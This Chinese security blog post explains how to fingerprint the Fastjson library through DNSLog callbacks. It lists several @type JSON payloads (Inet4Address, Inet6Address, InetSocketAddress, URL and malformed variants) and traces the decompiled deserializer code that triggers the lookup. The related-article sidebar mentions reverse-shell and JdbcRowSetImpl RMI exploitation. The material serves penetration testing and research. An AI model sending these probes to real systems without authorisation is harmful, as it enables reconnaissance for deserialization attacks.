Fastjson探测简介

最新推荐文章于 2024-06-09 09:54:10 发布
最新推荐文章于 2024-06-09 09:54:10 发布
阅读量4.4k 收藏 7
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/106009369
版权

Fastjson探测作用

在渗透测试中遇到json数据一般都会测试下有没有反序列化,然而JSON库有Fastjson,JackJson,Gson等等,那么怎么判断后端不是Fastjson呢?可以构造特定的payload来进行探测分析,下面介绍一些常用的payload,且这些Payload可以在AutoType关闭的情况下进行测试~~~

Fastjson探测方法

方法一:java.net.Inet4Address

请求方式

{"@type":"java.net.Inet4Address","val":"dnslog"}

请求测试

DNSLog响应

基础原理分析

Fastjson对于Inet4Address类会使用MiscCodec这个ObjectDeserializer来反序列化:

之后在MiscCodec的deserialze下断点进行调试分析:

之后跟进parse.parser,此处的parser为DefaultJSONParser:

之后跟进解析器:

之后再次跟进去看看字符串如何处理:

之后进行一次字符串的截取:

截取之后,截取到DNSlog域名信息:

之后将objVal赋值给strVal,其值为DNSLog域名:

之后会调用GetByName进行一次域名解析:

MiscCodec的deserialze函数代码如下所示:

    public <T> T deserialze(DefaultJSONParser parser, Type clazz, Object fieldName) {
        JSONLexer lexer = parser.lexer;
        String className;
        if (clazz == InetSocketAddress.class) {
            if (lexer.token() == 8) {
                lexer.nextToken();
                return null;
            } else {
                parser.accept(12);
                InetAddress address = null;
                int port = 0;

                while(true) {
                    className = lexer.stringVal();
                    lexer.nextToken(17);
                    if (className.equals("address")) {
                        parser.accept(17);
                        address = (InetAddress)parser.parseObject(InetAddress.class);
                    } else if (className.equals("port")) {
                        parser.accept(17);
                        if (lexer.token() != 2) {
                            throw new JSONException("port is not int");
                        }

                        port = lexer.intValue();
                        lexer.nextToken();
                    } else {
                        parser.accept(17);
                        parser.parse();
                    }

                    if (lexer.token() != 16) {
                        parser.accept(13);
                        return new InetSocketAddress(address, port);
                    }

                    lexer.nextToken();
                }
            }
        } else {
            Object objVal;
            if (parser.resolveStatus == 2) {
                parser.resolveStatus = 0;
                parser.accept(16);
                if (lexer.token() != 4) {
                    throw new JSONException("syntax error");
                }

                if (!"val".equals(lexer.stringVal())) {
                    throw new JSONException("syntax error");
                }

                lexer.nextToken();
                parser.accept(17);
                objVal = parser.parse();
                parser.accept(13);
            } else {
                objVal = parser.parse();
            }

            String strVal;
            if (objVal == null) {
                strVal = null;
            } else {
                if (!(objVal instanceof String)) {
                    if (objVal instanceof JSONObject) {
                        JSONObject jsonObject = (JSONObject)objVal;
                        if (clazz == Currency.class) {
                            String currency = jsonObject.getString("currency");
                            if (currency != null) {
                                return Currency.getInstance(currency);
                            }

                            String symbol = jsonObject.getString("currencyCode");
                            if (symbol != null) {
                                return Currency.getInstance(symbol);
                            }
                        }

                        if (clazz == Entry.class) {
                            return jsonObject.entrySet().iterator().next();
                        }

                        return jsonObject.toJavaObject(clazz);
                    }

                    throw new JSONException("expect string");
                }

                strVal = (String)objVal;
            }

            if (strVal != null && strVal.length() != 0) {
                if (clazz == UUID.class) {
                    return UUID.fromString(strVal);
                } else if (clazz == URI.class) {
                    return URI.create(strVal);
                } else if (clazz == URL.class) {
                    try {
                        return new URL(strVal);
                    } catch (MalformedURLException var10) {
                        throw new JSONException("create url error", var10);
                    }
                } else if (clazz == Pattern.class) {
                    return Pattern.compile(strVal);
                } else if (clazz == Locale.class) {
                    return TypeUtils.toLocale(strVal);
                } else if (clazz == SimpleDateFormat.class) {
                    SimpleDateFormat dateFormat = new SimpleDateFormat(strVal, lexer.getLocale());
                    dateFormat.setTimeZone(lexer.getTimeZone());
                    return dateFormat;
                } else if (clazz != InetAddress.class && clazz != Inet4Address.class && clazz != Inet6Address.class) {
                    if (clazz == File.class) {
                        if (strVal.indexOf("..") >= 0 && !FILE_RELATIVE_PATH_SUPPORT) {
                            throw new JSONException("file relative path not support.");
                        } else {
                            return new File(strVal);
                        }
                    } else if (clazz == TimeZone.class) {
                        return TimeZone.getTimeZone(strVal);
                    } else {
                        if (clazz instanceof ParameterizedType) {
                            ParameterizedType parmeterizedType = (ParameterizedType)clazz;
                            clazz = parmeterizedType.getRawType();
                        }

                        if (clazz == Class.class) {
                            return TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader(), false);
                        } else if (clazz == Charset.class) {
                            return Charset.forName(strVal);
                        } else if (clazz == Currency.class) {
                            return Currency.getInstance(strVal);
                        } else if (clazz == JSONPath.class) {
                            return new JSONPath(strVal);
                        } else if (!(clazz instanceof Class)) {
                            throw new JSONException("MiscCodec not support " + clazz.toString());
                        } else {
                            className = ((Class)clazz).getName();
                            if (className.equals("java.nio.file.Path")) {
                                try {
                                    if (method_paths_get == null && !method_paths_get_error) {
                                        Class<?> paths = TypeUtils.loadClass("java.nio.file.Paths");
                                        method_paths_get = paths.getMethod("get", String.class, String[].class);
                                    }

                                    if (method_paths_get != null) {
                                        return method_paths_get.invoke((Object)null, strVal, new String[0]);
                                    }

                                    throw new JSONException("Path deserialize erorr");
                                } catch (NoSuchMethodException var12) {
                                    method_paths_get_error = true;
                                } catch (IllegalAccessException var13) {
                                    throw new JSONException("Path deserialize erorr", var13);
                                } catch (InvocationTargetException var14) {
                                    throw new JSONException("Path deserialize erorr", var14);
                                }
                            }

                            throw new JSONException("MiscCodec not support " + className);
                        }
                    }
                } else {
                    try {
                        return InetAddress.getByName(strVal);
                    } catch (UnknownHostException var11) {
                        throw new JSONException("deserialize inet adress error", var11);
                    }
                }
            } else {
                return null;
            }
        }
    }

方法二:java.net.Inet6Address

请求方式

{"@type":"java.net.Inet6Address","val":"dnslog"}

请求测试

DNSLog响应

基础原理分析

java.net.Inet6Address与java.net.Inet4Address类似,使用了MiscCodec这个ObjectDeserializer来反序列化,其余的内容就不再复述了~

方式三:java.net.InetSocketAddress

请求方式

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

请求测试

DNSLog响应

基础原理分析

java.net.InetSocketAddress与java.net.Inet4Address类似,会使用MiscCodec的ObjectDeserializer来反序列化,由于此处的畸形JSON请求数据在解析时会有两次进入deserialze(这与Fastjson的Token性质有关,从而导致解析的逻辑走向发生变化,有兴趣的可以了解一下)第一次进入是clazz为:java.net.InetJSONParser:

第二次时为java.net.InetAddress:

之后将objVal赋值给strVal:

最后触发DNS解析:

方式四:java.net.URL

请求方式

{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}

请求测试

DNSLog响应

其他方式使用示例

畸形方式1

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}

请求测试:

DNSLog响应:

畸形方式2

Set[{"@type":"java.net.URL","val":"http://dnslog"}]

请求方式:

DNSLog响应:

畸形方式3

Set[{"@type":"java.net.URL","val":"http://dnslog"}

请求方式:

DNSLog响应:

畸形方式4

{{"@type":"java.net.URL","val":"http://dnslog"}:0

请求方式:

DNSLog响应:

畸形方式5

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

请求方式:

DNSLog响应:

跟多新技巧等待你的解锁~

 

参考链接:https://github.com/alibaba/fastjson/issues/3077

FLy_鹏程万里
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Fastjson
haha1314的博客
08-07 909
一、检测 1.2.67以下的fastjson {"@type":“java.net.Inet4Address”,“val”:“dnslog”} {"@type":“java.net.Inet6Address”,“val”:“dnslog”} 但是有的不成功。 二、利用 Docker搭建环境 2.1生成poc 下面文件为反弹shell,替换成这一句,dnslog检测。 String[] commands = {“ping”, “eqkkk1.dnslog.cn”}; 创建一个文件,TouchFile.jav
Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238)
qq_40646572的博客
05-08 697
fastjson在对 JSON 字符串进行反序列化的时候,会读取 @type 的内容,试图把 JSON 内容反序列化成这个对象,并且会调用这个类的set方法, 利用这个特性,构造一个 JSON 字符串,并且使 用 @type 反序列化一个自己想要使用的攻击类。com.sun.rowset.JdbcRowSetImpl就是一个支持调用rmi功能的类。因此可以使用com.sun.rowset.JdbcRowSetImpl类进行远程调用exp。
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
04-18 1742
Fastjson反序列化漏洞复现(实战案例)
探秘高效安全检测:Fastjson-Scanner 开源项目解析
最新发布
gitblog_00008的博客
06-09 717
探秘高效安全检测:Fastjson-Scanner 开源项目解析 项目地址:https://gitcode.com/p1g3/Fastjson-Scanner 在当今的Web应用程序开发中,JSON(JavaScript Object Notation)已成为数据交换的主要格式。然而,随着其广泛使用,也暴露出一些潜在的安全问题,特别是在Fastjson这样的流行库中。为了帮助开发者预防和检测这些问...
通过dnslog探测fastjson的几种方法
Adminxe的博客
05-04 7646
0x01 背景 在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。 昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇...
java.net.Inet4Address 代码实例
dowemo的博客
10-25 3857
java.net.Inet4Address 代码实例 以下是展示如何使用java.net.Inet4Address的最佳示例。 我们使用了代码质量辨别算法从开源项目中提取出了最佳的优秀示例。 实例 1 package io.hydrosphere.mist.utils import java.net.{Inet4Address, InetAddress, NetworkIn
FastJson.java
09-04
com.alibaba.fastjson.JSON读写json
FastJsonJar
01-05
FastJsonJar:Java开发中的高效JSON处理库》 FastJsonJar,正如其名,是一个专为Java开发者设计的高效JSON解析和生成工具。在现代Web服务和移动应用开发中,JSON作为数据交换格式,其使用频率之高不言而喻。...
fastjson使用
10-30
**Fastjson 深度解析与使用指南** Fastjson 是阿里巴巴开源的一款高性能的 JSON 库,它具有极快的解析速度和简洁的 API 设计,广泛应用于 Java 开发中。在本文中,我们将深入探讨 Fastjson 的核心特性、基本用法、...
FastJson.zip
12-16
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 源码地址:...
fastjson.zip
03-04
**Fastjson 深度解析** Fastjson 是阿里巴巴开源的一款高效、功能强大的 JSON 库,广泛应用于 Java 开发中。它的主要特点是性能优异,解析和序列化速度快,且使用简单,使得开发人员能够轻松地在 Java 对象和 JSON ...
Fastjson漏洞的识别与DNSlog回显
tpaer的博客
09-02 4649
Fastjson RCE漏洞实战POC探测方式
HVV面试问题整理
m0_64376527的博客
04-17 2827
护网面试题目整理
Java 版本的 InetAddress Inet4Address or Inet6Address 基本用法
zhanghao_Hulk的专栏
06-19 3032
直接通过demo判断地址类型IPv4和IPv6, demo如下: package com.hulk.http.util; import java.net.Inet4Address; import java.net.Inet6Address; import java.net.InetAddress; import java.net.UnknownHostException; import java.util.Arrays; /** * InetAddress单元测试 * @author: z.
JAVA 篇net 之Inet4AddressInet6Address、URL、URLConnection、HttpURLConnection
07-29 1087
为什么要说介绍这几个类,是因为我们在工作中会接触到通过客服端调用的方式 1、Inet4AddressInet6AddressInetAddress 这两个类主要链接远程机器用的,父类是InetAddress,先来看看是怎么实现拿到机器的ip地址的 public InetAddress...
Fastjson 1.2.47 远程命令执行漏
锋刃科技的博客
06-11 2300
1. 漏洞简介 Fastjosn 无疑是这两年的漏洞之王, 一手反序列化RCE影响无数厂商, 目前1.2.48以下版本稳定受影响, 1.2.68以下版本开启Autotype会受到影响 (不排除传说中的1.2.67以下RCE漏洞, 期待八仙过海) 2. 影响组件 Fastjson < 1.2.48 (<1.2.68?) 3. 漏洞指纹 可以通过DNS回显的方式检测后端是否使用Fastjson {"@type":"java.net.Inet4Address", "val":"dnsl
fastjson反序列化漏洞区分版本号的方法总结
yggcwhat
07-16 2808
fastjson反序列化漏洞区分版本号的方法总结
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2194
Fastjson反序列化漏洞复现
fastjson fastjson2
09-02
FastjsonFastjson2都是JSON库,用于处理JSON格式的数据。 Fastjson2是Fastjson项目的重要升级,旨在为未来十年提供高性能的JSON库。相比于原来的FastjsonFastjson2在性能上有了很大的提升,并且更加安全。它完全删除了autoType白名单,提升了安全性。 在使用上,导入Fastjson2的依赖后,与原来的Fastjson在代码上基本相同。唯一的区别是在Fastjson2中,将`jsonArray.toJavaList`方法转变为`jsonArray.toList`。 总结来说,FastjsonFastjson2都是用于处理JSON数据的库,但Fastjson2是Fastjson的升级版本,提供了更高的性能和更好的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [fastjson2 介绍及使用](https://blog.csdn.net/qq_33697094/article/details/128114939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Fastjson2你开始使用了吗?来看看源码解析](https://blog.csdn.net/chenxuyuana/article/details/125581066)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值